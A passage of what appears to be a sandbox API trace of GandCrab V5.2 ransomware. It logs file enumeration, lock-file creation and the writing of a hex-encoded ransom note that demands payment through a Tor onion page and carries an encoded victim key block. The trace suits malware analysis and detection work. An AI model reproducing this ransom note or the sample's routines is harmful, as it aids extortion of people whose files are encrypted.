x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0097.003] WriteFile (in: hFile=0x2ac, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259f274, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259f274*=0x2162, lpOverlapped=0x0) returned 1 [0097.004] CloseHandle (hObject=0x2ac) returned 1 [0097.004] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.004] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0097.004] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x2a, wMilliseconds=0x13c)) [0097.004] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0097.004] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0097.004] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0097.004] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\Public\\Documents\\My Music\\d2ca4a09d2ca4deb61a.lock") returned 59 [0097.004] CreateFileW (lpFileName="C:\\Users\\Public\\Documents\\My Music\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\public\\documents\\my music\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2ac [0097.005] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.005] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.005] lstrlenW (lpString="C:\\Users\\Public\\Documents\\My Music\\") returned 35 [0097.005] lstrcatW (in: lpString1="C:\\Users\\Public\\Documents\\My Music\\", lpString2="*" | out: lpString1="C:\\Users\\Public\\Documents\\My Music\\*") returned="C:\\Users\\Public\\Documents\\My Music\\*" [0097.005] FindFirstFileExW (in: lpFileName="C:\\Users\\Public\\Documents\\My Music\\*", fInfoLevelId=0x1, lpFindFileData=0x259f290, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259f290) returned 0xffffffff [0097.005] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Documents\\My Music\\*", lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 0xffffffff [0097.005] CloseHandle (hObject=0x2ac) returned 1 [0097.005] FindNextFileW (in: hFindFile=0x503238, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0097.006] lstrcmpW (lpString1="My Pictures", lpString2=".") returned 1 [0097.006] lstrcmpW (lpString1="My Pictures", lpString2="..") returned 1 [0097.006] lstrcatW (in: lpString1="C:\\Users\\Public\\Documents\\", lpString2="My Pictures" | out: lpString1="C:\\Users\\Public\\Documents\\My Pictures") returned="C:\\Users\\Public\\Documents\\My Pictures" [0097.006] lstrcatW (in: lpString1="C:\\Users\\Public\\Documents\\My Pictures", lpString2="\\" | out: lpString1="C:\\Users\\Public\\Documents\\My Pictures\\") returned="C:\\Users\\Public\\Documents\\My Pictures\\" [0097.006] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0097.006] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0097.006] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0097.006] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0097.006] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0097.006] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0097.007] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0097.007] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0097.007] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0097.007] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.007] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0097.007] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\Public\\Documents\\My Pictures\\\\TITWMVJL-DECRYPT.txt") returned 59 [0097.007] CreateFileW (lpFileName="C:\\Users\\Public\\Documents\\My Pictures\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\public\\documents\\my pictures\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0097.008] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a